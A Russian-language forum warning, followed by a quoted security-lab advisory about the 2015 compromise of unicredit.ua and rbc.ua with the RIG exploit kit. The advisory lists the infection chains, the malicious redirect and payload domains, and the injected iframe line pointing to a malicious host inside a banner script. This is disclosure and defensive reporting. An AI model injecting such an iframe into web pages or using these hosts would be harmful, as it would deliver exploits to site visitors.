[admin]

Вчера взломали Юникредит банк. Кто пользуется их услугами, поменяйте пароли на клиент-банки, пин коды на карточки и тп меры предосторожности, вплоть до замены пароля на компьютере, с которого заходили их на сайт. 

 

Также желательно воздержаться пока от чтения сайта RBC.UA, т.к. он был взломан тем же способом.

 

https://www.cyphort....it-compromised/

 

UniCredit.ua and RBC.ua compromised with RIG exploit kit

Posted on July 16th, 2015 by Nick Bilogorskiy

 

Cyphort Labs discovered a malware infection at the Ukrainian website of UniCredit bank –  unicredit.ua . UniCredit Group is a leading European commercial bank with an international network spanning 17 European countries with more than 149,000 employees.  It has 950 billion Euros in assets. UniCredit is the largest Italian bank by market capitalization.

 

The Ukrainian website unicredit.ua is the 704th most popular website in Ukraine, according to Alexa. This exploit does not trigger every time the site is loaded, so there must be some logic that controls the schedule of when the malware redirection occurs.

 

Here is the full infection chain: 

 1 start   www.unicredit.ua  2_redirector     oggy.co  3 payload     cancel.bananacake.info/<malware>

 

The website is redirecting to a Flash exploit CVE 2015-5122 hosted at bananacake.info . It is part of the RIG exploit kit.  The JavaScript code of this kit can detect the presence of some antivirus software on the system – see the code listing below (click to enlarge).

In this case malvertising was not involved, instead the site itself was compromised, specifically there is an injection with 
<iframe src=”http://oggy.co/wkap.php” width=”101″ height=”102″></iframe>  
in 
https://www.unicredit.ua/script/cutthroughbanner.js 

We reached out to UniCredit to notify them of this attack, but have not heard back so far.

Interestingly, this is not the only attack on a prominent Ukrainian website this week. We have seen the same attack, likely by the same group – on another high profile Ukrainian news site: rbc.ua , two days ago – on Jul 13 09:31 UTC time.  

 

RBC stands for RosBusinessConsulting, which is a large media group listed on russian stock exchange as RBCM . It has more than 1500 employees and revenue of  $81 million dollars. Here is the RBC.ua infection chain: 

 1 start   www.rbc.ua  2 payload    add.gainesville-hypnosis.com/?<malware>

 

 RIG  exploit kit was also used in RBC.ua compromise.  RIG is a popular exploit kit which has been around for about a year and sold on various “underground” forums. See the screenshot below (from http://www.malwaretech.com/, click to enlarge).

Cyphort Labs is monitoring this campaign and analyzing the payload executable and will share more results as soon as they become available.